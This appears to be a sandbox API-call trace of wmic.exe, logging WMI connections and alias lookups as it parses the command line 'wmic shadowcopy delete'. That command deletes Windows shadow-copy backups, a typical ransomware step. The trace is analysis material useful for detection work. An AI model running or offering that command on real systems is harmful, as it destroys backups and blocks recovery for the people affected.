	[0252.841] IXMLDOMNode:get_nodeValue (in: This=0xc89ff8, value=0xcf6ac | out: value=0xcf6ac*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x0)) returned 0x0
	[0252.841] malloc (_Size=0xc) returned 0x7786b0
	[0252.841] malloc (_Size=0xc) returned 0x778728
	[0252.841] SysStringLen (param_1="wmiclimofformat") returned 0xf
	[0252.841] SysStringLen (param_1="TABLE") returned 0x5
	[0252.841] SysStringLen (param_1="wmiclimofformat") returned 0xf
	[0252.841] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0252.841] SysStringLen (param_1="wmiclimofformat") returned 0xf
	[0252.841] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0252.841] SysStringLen (param_1="wmiclimofformat") returned 0xf
	[0252.842] SysStringLen (param_1="wmiclitableformat") returned 0x11
	[0252.842] SysStringLen (param_1="wmiclimofformat") returned 0xf
	[0252.842] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
	[0252.842] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0252.842] SysStringLen (param_1="wmiclimofformat") returned 0xf
	[0252.842] malloc (_Size=0x18) returned 0x772418
	[0252.842] IUnknown:Release (This=0xc86b88) returned 0x0
	[0252.842] IUnknown:Release (This=0xc89fa8) returned 0x0
	[0252.842] IUnknown:Release (This=0xc89ff8) returned 0x0
	[0252.842] IXMLDOMNodeList:get_item (in: This=0xc89ca0, index=19, listItem=0xcf6f4 | out: listItem=0xcf6f4*=0xc86b88) returned 0x0
	[0252.843] IXMLDOMNode:get_text (in: This=0xc86b88, text=0xcf6f8 | out: text=0xcf6f8*="textvaluelist.xsl") returned 0x0
	[0252.843] IXMLDOMNode:get_attributes (in: This=0xc86b88, attributeMap=0xcf6f0 | out: attributeMap=0xcf6f0*=0xc89fa8) returned 0x0
	[0252.843] malloc (_Size=0xc) returned 0x7788f0
	[0252.843] IXMLDOMNamedNodeMap:getNamedItem (in: This=0xc89fa8, name="KEYWORD", namedItem=0xcf6ec | out: namedItem=0xcf6ec*=0xc89ff8) returned 0x0
	[0252.843] free (_Block=0x7788f0) 
	[0252.843] IXMLDOMNode:get_nodeValue (in: This=0xc89ff8, value=0xcf6ac | out: value=0xcf6ac*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x0)) returned 0x0
	[0252.843] malloc (_Size=0xc) returned 0x778860
	[0252.844] malloc (_Size=0xc) returned 0x778878
	[0252.844] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
	[0252.844] SysStringLen (param_1="TABLE") returned 0x5
	[0252.844] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
	[0252.844] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0252.844] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
	[0252.844] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0252.844] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
	[0252.844] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
	[0252.844] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
	[0252.844] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
	[0252.844] malloc (_Size=0x18) returned 0x772538
	[0252.845] IUnknown:Release (This=0xc86b88) returned 0x0
	[0252.845] IUnknown:Release (This=0xc89fa8) returned 0x0
	[0252.845] IUnknown:Release (This=0xc89ff8) returned 0x0
	[0252.845] IXMLDOMNodeList:get_item (in: This=0xc89ca0, index=20, listItem=0xcf6f4 | out: listItem=0xcf6f4*=0xc86b88) returned 0x0
	[0252.845] IXMLDOMNode:get_text (in: This=0xc86b88, text=0xcf6f8 | out: text=0xcf6f8*="textvaluelist.xsl") returned 0x0
	[0252.846] IXMLDOMNode:get_attributes (in: This=0xc86b88, attributeMap=0xcf6f0 | out: attributeMap=0xcf6f0*=0xc89fa8) returned 0x0
	[0252.846] malloc (_Size=0xc) returned 0x778890
	[0252.846] IXMLDOMNamedNodeMap:getNamedItem (in: This=0xc89fa8, name="KEYWORD", namedItem=0xcf6ec | out: namedItem=0xcf6ec*=0xc89ff8) returned 0x0
	[0252.846] free (_Block=0x778890) 
	[0252.846] IXMLDOMNode:get_nodeValue (in: This=0xc89ff8, value=0xcf6ac | out: value=0xcf6ac*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x0)) returned 0x0
	[0252.846] malloc (_Size=0xc) returned 0x778890
	[0252.846] malloc (_Size=0xc) returned 0x778740
	[0252.847] SysStringLen (param_1="wmiclivalueformat") returned 0x11
	[0252.847] SysStringLen (param_1="TABLE") returned 0x5
	[0252.847] SysStringLen (param_1="wmiclivalueformat") returned 0x11
	[0252.847] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0252.847] SysStringLen (param_1="wmiclivalueformat") returned 0x11
	[0252.847] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0252.847] SysStringLen (param_1="wmiclivalueformat") returned 0x11
	[0252.847] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
	[0252.847] SysStringLen (param_1="wmiclivalueformat") returned 0x11
	[0252.847] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
	[0252.847] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
	[0252.847] SysStringLen (param_1="wmiclivalueformat") returned 0x11
	[0252.847] malloc (_Size=0x18) returned 0x772438
	[0252.848] IUnknown:Release (This=0xc86b88) returned 0x0
	[0252.848] IUnknown:Release (This=0xc89fa8) returned 0x0
	[0252.848] IUnknown:Release (This=0xc89ff8) returned 0x0
	[0252.848] IUnknown:Release (This=0xc89ca0) returned 0x0
	[0252.848] FreeThreadedDOMDocument:IUnknown:Release (This=0xc86b48) returned 0x1
	[0252.849] FreeThreadedDOMDocument:IUnknown:Release (This=0xc845a8) returned 0x0
	[0252.849] free (_Block=0x772ce0) 
	[0252.849] GetCommandLineW () returned="wmic  shadowcopy delete"
	[0252.855] malloc (_Size=0x30) returned 0x778a70
	[0252.855] memcpy_s (in: _Destination=0x778a70, _DestinationSize=0x2e, _Source=0x461660, _SourceSize=0x2e | out: _Destination=0x778a70) returned 0x0
	[0252.855] malloc (_Size=0xc) returned 0x7788a8
	[0252.855] malloc (_Size=0xc) returned 0x7788c0
	[0252.855] malloc (_Size=0xc) returned 0x778920
	[0252.855] malloc (_Size=0xc) returned 0x7788d8
	[0252.856] malloc (_Size=0x80) returned 0x778aa8
	[0252.856] GetLocalTime (in: lpSystemTime=0xcf68c | out: lpSystemTime=0xcf68c*(wYear=0x7e7, wMonth=0x4, wDayOfWeek=0x0, wDay=0x1e, wHour=0x2, wMinute=0x23, wSecond=0x27, wMilliseconds=0x27c)) 
	[0252.856] _vsnwprintf (in: _Buffer=0x778aa8, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0xcf66c | out: _Buffer="04-30-2023T02:35:39") returned 19
	[0252.856] lstrlenW (lpString="  shadowcopy delete") returned 19
	[0252.856] malloc (_Size=0x28) returned 0x778b30
	[0252.856] lstrlenW (lpString="  shadowcopy delete") returned 19
	[0252.856] lstrlenW (lpString="  shadowcopy delete") returned 19
	[0252.856] malloc (_Size=0x28) returned 0x778b60
	[0252.857] lstrlenW (lpString="  shadowcopy delete") returned 19
	[0252.857] lstrlenW (lpString="  shadowcopy delete") returned 19
	[0252.857] lstrlenW (lpString="  shadowcopy delete") returned 19
	[0252.857] malloc (_Size=0x16) returned 0x7724d8
	[0252.857] lstrlenW (lpString="shadowcopy") returned 10
	[0252.857] _wcsicmp (_String1="shadowcopy", _String2="\"NULL\"") returned 81
	[0252.857] malloc (_Size=0x16) returned 0x7724f8
	[0252.857] malloc (_Size=0x4) returned 0x778b90
	[0252.857] free (_Block=0x0) 
	[0252.858] free (_Block=0x7724d8) 
	[0252.858] lstrlenW (lpString="  shadowcopy delete") returned 19
	[0252.858] malloc (_Size=0xe) returned 0x7786f8
	[0252.858] lstrlenW (lpString="delete") returned 6
	[0252.858] _wcsicmp (_String1="delete", _String2="\"NULL\"") returned 66
	[0252.858] malloc (_Size=0xe) returned 0x7788f0
	[0252.858] malloc (_Size=0x8) returned 0x778ba0
	[0252.858] memmove_s (in: _Destination=0x778ba0, _DestinationSize=0x4, _Source=0x778b90, _SourceSize=0x4 | out: _Destination=0x778ba0) returned 0x0
	[0252.858] free (_Block=0x778b90) 
	[0252.858] free (_Block=0x0) 
	[0252.858] free (_Block=0x7786f8) 
	[0252.858] malloc (_Size=0x8) returned 0x778b90
	[0252.858] lstrlenW (lpString="QUIT") returned 4
	[0252.859] lstrlenW (lpString="shadowcopy") returned 10
	[0252.859] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3
	[0252.859] lstrlenW (lpString="EXIT") returned 4
	[0252.859] lstrlenW (lpString="shadowcopy") returned 10
	[0252.859] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3
	[0252.859] free (_Block=0x778b90) 
	[0252.859] WbemLocator:IUnknown:AddRef (This=0x462a00) returned 0x2
	[0252.859] malloc (_Size=0x8) returned 0x778b90
	[0252.860] lstrlenW (lpString="/") returned 1
	[0252.860] lstrlenW (lpString="shadowcopy") returned 10
	[0252.860] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="/", cchCount2=1) returned 3
	[0252.860] lstrlenW (lpString="-") returned 1
	[0252.860] lstrlenW (lpString="shadowcopy") returned 10
	[0252.860] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="-", cchCount2=1) returned 3
	[0252.860] lstrlenW (lpString="CLASS") returned 5
	[0252.860] lstrlenW (lpString="shadowcopy") returned 10
	[0252.860] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3
	[0252.860] lstrlenW (lpString="PATH") returned 4
	[0252.860] lstrlenW (lpString="shadowcopy") returned 10
	[0252.860] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3
	[0252.862] lstrlenW (lpString="CONTEXT") returned 7
	[0252.862] lstrlenW (lpString="shadowcopy") returned 10
	[0252.862] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3
	[0252.862] lstrlenW (lpString="shadowcopy") returned 10
	[0252.862] malloc (_Size=0x16) returned 0x7724d8
	[0252.862] lstrlenW (lpString="shadowcopy") returned 10
	[0252.862] GetCurrentThreadId () returned 0xfd4
	[0252.862] ??0CHString@@QAE@XZ () returned 0xcf5e0
	[0252.863] malloc (_Size=0xc) returned 0x778938
	[0252.863] malloc (_Size=0xc) returned 0x7786c8
	[0252.863] WbemLocator:IWbemLocator:ConnectServer (in: This=0x462a00, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1059540 | out: ppNamespace=0x1059540*=0x4951c8) returned 0x0
	[0256.071] free (_Block=0x7786c8) 
	[0256.071] free (_Block=0x778938) 
	[0256.071] CoSetProxyBlanket (pProxy=0x4951c8, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0
	[0256.072] ??1CHString@@QAE@XZ () returned 0x6f886260
	[0256.072] GetCurrentThreadId () returned 0xfd4
	[0256.072] ??0CHString@@QAE@XZ () returned 0xcf588
	[0256.072] malloc (_Size=0xc) returned 0x778938
	[0256.073] malloc (_Size=0xc) returned 0x7786e0
	[0256.073] malloc (_Size=0xc) returned 0x7786c8
	[0256.073] malloc (_Size=0xc) returned 0x7786f8
	[0256.073] SysStringLen (param_1="root\\cli") returned 0x8
	[0256.073] SysStringLen (param_1="\\") returned 0x1
	[0256.073] memcpy (in: _Dst=0x4a4944, _Src=0x4a4b9c, _Size=0x12 | out: _Dst=0x4a4944) returned 0x4a4944
	[0256.073] memcpy (in: _Dst=0x4a4954, _Src=0x4a4714, _Size=0x4 | out: _Dst=0x4a4954) returned 0x4a4954
	[0256.073] malloc (_Size=0xc) returned 0x778a28
	[0256.073] SysStringLen (param_1="root\\cli\\") returned 0x9
	[0256.073] SysStringLen (param_1="ms_409") returned 0x6
	[0256.074] memcpy (in: _Dst=0x47957c, _Src=0x4a4944, _Size=0x14 | out: _Dst=0x47957c) returned 0x47957c
	[0256.074] memcpy (in: _Dst=0x47958e, _Src=0x4a473c, _Size=0xe | out: _Dst=0x47958e) returned 0x47958e
	[0256.074] free (_Block=0x7786f8) 
	[0256.075] free (_Block=0x7786c8) 
	[0256.075] free (_Block=0x7786e0) 
	[0256.075] free (_Block=0x778938) 
	[0256.075] malloc (_Size=0xc) returned 0x778938
	[0256.075] WbemLocator:IWbemLocator:ConnectServer (in: This=0x462a00, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1059544 | out: ppNamespace=0x1059544*=0x4954e8) returned 0x0
	[0257.651] free (_Block=0x778938) 
	[0257.651] free (_Block=0x778a28) 
	[0257.651] ??1CHString@@QAE@XZ () returned 0x6f886260
	[0257.651] GetCurrentThreadId () returned 0xfd4
	[0257.652] ??0CHString@@QAE@XZ () returned 0xcf5e4
	[0257.652] malloc (_Size=0xc) returned 0x778998
	[0257.652] malloc (_Size=0xc) returned 0x7789b0
	[0257.652] malloc (_Size=0xc) returned 0x778a58
	[0257.655] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28
	[0257.655] malloc (_Size=0x3a) returned 0x779bb8
	[0257.656] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1011478, cbMultiByte=-1, lpWideCharStr=0x779bb8, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29
	[0257.656] free (_Block=0x779bb8) 
	[0257.656] malloc (_Size=0xc) returned 0x7789e0
	[0257.656] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c
	[0257.656] SysStringLen (param_1="shadowcopy") returned 0xa
	[0257.657] memcpy (in: _Dst=0x4914a4, _Src=0x4aba24, _Size=0x3a | out: _Dst=0x4914a4) returned 0x4914a4
	[0257.657] memcpy (in: _Dst=0x4914dc, _Src=0x4a4b9c, _Size=0x16 | out: _Dst=0x4914dc) returned 0x4914dc
	[0257.657] malloc (_Size=0xc) returned 0x7789c8
	[0257.657] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='shadowcopy") returned 0x26
	[0257.657] SysStringLen (param_1="'") returned 0x1
	[0257.657] memcpy (in: _Dst=0x47a4cc, _Src=0x4914a4, _Size=0x4e | out: _Dst=0x47a4cc) returned 0x47a4cc
	[0257.657] memcpy (in: _Dst=0x47a518, _Src=0x4a4944, _Size=0x4 | out: _Dst=0x47a518) returned 0x47a518
	[0257.657] free (_Block=0x7789e0) 
	[0257.657] free (_Block=0x778a58) 
	[0257.657] free (_Block=0x7789b0) 
	[0257.658] free (_Block=0x778998) 
	[0257.658] IWbemServices:GetObject (in: This=0x4951c8, strObjectPath="MSFT_CliAlias.FriendlyName='shadowcopy'", lFlags=0, pCtx=0x0, ppObject=0xcf5e0*=0x0, ppCallResult=0x0 | out: ppObject=0xcf5e0*=0x499e50, ppCallResult=0x0) returned 0x0
	[0257.904] malloc (_Size=0xc) returned 0x7789e0
	[0257.905] IWbemClassObject:Get (in: This=0x499e50, wszName="Target", lFlags=0, pVal=0xcf5b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf5b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_ShadowCopy", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0257.905] free (_Block=0x7789e0) 
	[0257.905] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30
	[0257.905] malloc (_Size=0x3e) returned 0x779bb8
	[0257.906] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30
	[0257.906] malloc (_Size=0xc) returned 0x7789b0
	[0257.906] IWbemClassObject:Get (in: This=0x499e50, wszName="PWhere", lFlags=0, pVal=0xcf5b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf5b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=" Where ID = '#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0257.906] free (_Block=0x7789b0) 
	[0257.906] lstrlenW (lpString=" Where ID = '#'") returned 15
	[0257.906] malloc (_Size=0x20) returned 0x779c00
	[0257.906] lstrlenW (lpString=" Where ID = '#'") returned 15
	[0257.906] malloc (_Size=0xc) returned 0x7789b0
	[0257.907] IWbemClassObject:Get (in: This=0x499e50, wszName="Connection", lFlags=0, pVal=0xcf5b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf5b8*(varType=0xd, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x49a210, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0257.907] free (_Block=0x7789b0) 
	[0257.907] IUnknown:QueryInterface (in: This=0x49a210, riid=0x10169ac*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0xcf5d4 | out: ppvObject=0xcf5d4*=0x49a210) returned 0x0
	[0257.907] GetCurrentThreadId () returned 0xfd4
	[0257.907] ??0CHString@@QAE@XZ () returned 0xcf554
	[0257.907] malloc (_Size=0xc) returned 0x778a58
	[0257.908] IWbemClassObject:Get (in: This=0x49a210, wszName="Namespace", lFlags=0, pVal=0xcf538*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf538*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0257.908] free (_Block=0x778a58) 
	[0257.908] lstrlenW (lpString="ROOT\\CIMV2") returned 10
	[0257.908] malloc (_Size=0x16) returned 0x772578
	[0257.908] lstrlenW (lpString="ROOT\\CIMV2") returned 10
	[0257.908] malloc (_Size=0xc) returned 0x778a58
	[0257.908] IWbemClassObject:Get (in: This=0x49a210, wszName="Locale", lFlags=0, pVal=0xcf538*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4a4714, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf538*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0257.908] free (_Block=0x778a58) 
	[0257.908] lstrlenW (lpString="ms_409") returned 6
	[0257.908] malloc (_Size=0xe) returned 0x778a28
	[0257.908] lstrlenW (lpString="ms_409") returned 6
	[0257.909] malloc (_Size=0xc) returned 0x778998
	[0257.909] IWbemClassObject:Get (in: This=0x49a210, wszName="User", lFlags=0, pVal=0xcf538*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4a4714, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf538*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0257.909] free (_Block=0x778998) 
	[0257.909] malloc (_Size=0xc) returned 0x7789b0
	[0257.909] IWbemClassObject:Get (in: This=0x49a210, wszName="Password", lFlags=0, pVal=0xcf538*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf538*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0257.909] free (_Block=0x7789b0) 
	[0257.909] malloc (_Size=0xc) returned 0x7789e0
	[0257.910] IWbemClassObject:Get (in: This=0x49a210, wszName="Server", lFlags=0, pVal=0xcf538*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf538*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0257.910] free (_Block=0x7789e0) 
	[0257.910] lstrlenW (lpString=".") returned 1
	[0257.910] malloc (_Size=0x4) returned 0x779c28
	[0257.910] lstrlenW (lpString=".") returned 1
	[0257.910] malloc (_Size=0xc) returned 0x778a10
	[0257.910] IWbemClassObject:Get (in: This=0x49a210, wszName="Authority", lFlags=0, pVal=0xcf538*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4a4714, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf538*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0257.910] free (_Block=0x778a10) 
	[0257.910] ??1CHString@@QAE@XZ () returned 0x6f886260
	[0257.911] IUnknown:Release (This=0x49a210) returned 0x1
	[0257.911] GetCurrentThreadId () returned 0xfd4
	[0257.911] ??0CHString@@QAE@XZ () returned 0xcf544
	[0257.911] malloc (_Size=0xc) returned 0x7789e0
	[0257.911] IWbemClassObject:Get (in: This=0x499e50, wszName="__RELPATH", lFlags=0, pVal=0xcf52c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf52c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0257.912] free (_Block=0x7789e0) 
	[0257.912] malloc (_Size=0xc) returned 0x778998
	[0257.912] GetCurrentThreadId () returned 0xfd4
	[0257.912] ??0CHString@@QAE@XZ () returned 0xcf4c0
	[0257.912] ??0CHString@@QAE@PBG@Z () returned 0xcf4bc
	[0257.912] ??0CHString@@QAE@ABV0@@Z () returned 0xcf43c
	[0257.912] ?Empty@CHString@@QAEXXZ () returned 0x6f886260
	[0257.913] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x779c38
	[0257.913] ?Find@CHString@@QBEHPBG@Z () returned 0x1b
	[0257.913] ?Left@CHString@@QBE?AV1@H@Z () returned 0xcf434
	[0257.913] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0xcf438
	[0257.913] ??YCHString@@QAEABV0@ABV0@@Z () returned 0xcf4bc
	[0257.913] ??1CHString@@QAE@XZ () returned 0x1
	[0257.913] ??1CHString@@QAE@XZ () returned 0x1
	[0257.913] ?Mid@CHString@@QBE?AV1@H@Z () returned 0xcf430
	[0257.913] ??4CHString@@QAEABV0@ABV0@@Z () returned 0xcf43c
	[0257.913] ??1CHString@@QAE@XZ () returned 0x1
	[0257.913] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x779ca0
	[0257.913] ?Find@CHString@@QBEHPBG@Z () returned 0xa
	[0257.913] ?Left@CHString@@QBE?AV1@H@Z () returned 0xcf434
	[0257.913] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0xcf438
	[0257.913] ??YCHString@@QAEABV0@ABV0@@Z () returned 0xcf4bc
	[0257.913] ??1CHString@@QAE@XZ () returned 0x1
	[0257.914] ??1CHString@@QAE@XZ () returned 0x1
	[0257.914] ?Mid@CHString@@QBE?AV1@H@Z () returned 0xcf430
	[0257.914] ??4CHString@@QAEABV0@ABV0@@Z () returned 0xcf43c
	[0257.914] ??1CHString@@QAE@XZ () returned 0x6f886260
	[0257.914] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x6f886254
	[0257.914] ??1CHString@@QAE@XZ () returned 0x6f886260
	[0257.914] malloc (_Size=0xc) returned 0x778a58
	[0257.914] malloc (_Size=0xc) returned 0x7789e0
	[0257.914] malloc (_Size=0xc) returned 0x7789b0
	[0257.914] malloc (_Size=0xc) returned 0x778a40
	[0257.915] malloc (_Size=0xc) returned 0x7789f8
	[0257.915] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c
	[0257.915] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17
	[0257.915] memcpy (in: _Dst=0x4bd964, _Src=0x49a7f4, _Size=0x7a | out: _Dst=0x4bd964) returned 0x4bd964
	[0257.915] memcpy (in: _Dst=0x4bd9dc, _Src=0x4aba24, _Size=0x30 | out: _Dst=0x4bd9dc) returned 0x4bd9dc
	[0257.915] malloc (_Size=0xc) returned 0x778a10
	[0257.915] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53
	[0257.915] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29
	[0257.915] memcpy (in: _Dst=0x4bda1c, _Src=0x4bd964, _Size=0xa8 | out: _Dst=0x4bda1c) returned 0x4bda1c
	[0257.915] memcpy (in: _Dst=0x4bdac2, _Src=0x49a3bc, _Size=0x54 | out: _Dst=0x4bdac2) returned 0x4bdac2
	[0257.915] malloc (_Size=0xc) returned 0x7786c8
	[0257.915] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c
	[0257.915] SysStringLen (param_1="\"") returned 0x1
	[0257.916] memcpy (in: _Dst=0x4bdb24, _Src=0x4bda1c, _Size=0xfa | out: _Dst=0x4bdb24) returned 0x4bdb24
	[0257.916] memcpy (in: _Dst=0x4bdc1c, _Src=0x4a4714, _Size=0x4 | out: _Dst=0x4bdc1c) returned 0x4bdc1c
	[0257.916] free (_Block=0x778a10) 
	[0257.916] free (_Block=0x7789f8) 
	[0257.916] free (_Block=0x778a40) 
	[0257.916] free (_Block=0x7789b0) 
	[0257.916] free (_Block=0x7789e0) 
	[0257.917] free (_Block=0x778a58) 
	[0257.917] IWbemServices:GetObject (in: This=0x4954e8, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0xcf4cc*=0x0, ppCallResult=0x0 | out: ppObject=0xcf4cc*=0x4bded8, ppCallResult=0x0) returned 0x0
	[0258.096] malloc (_Size=0xc) returned 0x7789b0
	[0258.096] IWbemClassObject:Get (in: This=0x4bded8, wszName="Text", lFlags=0, pVal=0xcf498*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf498*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x492b40*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x49ae10, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0258.096] free (_Block=0x7789b0) 
	[0258.096] SafeArrayGetLBound (in: psa=0x492b40, nDim=0x1, plLbound=0xcf4a8 | out: plLbound=0xcf4a8) returned 0x0
	[0258.096] SafeArrayGetUBound (in: psa=0x492b40, nDim=0x1, plUbound=0xcf4ac | out: plUbound=0xcf4ac) returned 0x0
	[0258.097] SafeArrayGetElement (in: psa=0x492b40, rgIndices=0xcf4c4, pv=0xcf4b0 | out: pv=0xcf4b0) returned 0x0
	[0258.097] malloc (_Size=0xc) returned 0x778a40
	[0258.097] malloc (_Size=0xc) returned 0x7789b0
	[0258.097] SysStringLen (param_1="Shadow copy management.") returned 0x17
	[0258.097] memcpy (in: _Dst=0x4abe14, _Src=0x47957c, _Size=0x30 | out: _Dst=0x4abe14) returned 0x4abe14
	[0258.097] free (_Block=0x778a40) 
	[0258.097] IUnknown:Release (This=0x4bded8) returned 0x0
	[0258.097] free (_Block=0x7786c8) 
	[0258.098] ??1CHString@@QAE@XZ () returned 0x1
	[0258.098] ??1CHString@@QAE@XZ () returned 0x6f886260
	[0258.098] free (_Block=0x778998) 
	[0258.098] ??1CHString@@QAE@XZ () returned 0x6f886260
	[0258.098] lstrlenW (lpString="Shadow copy management.") returned 23
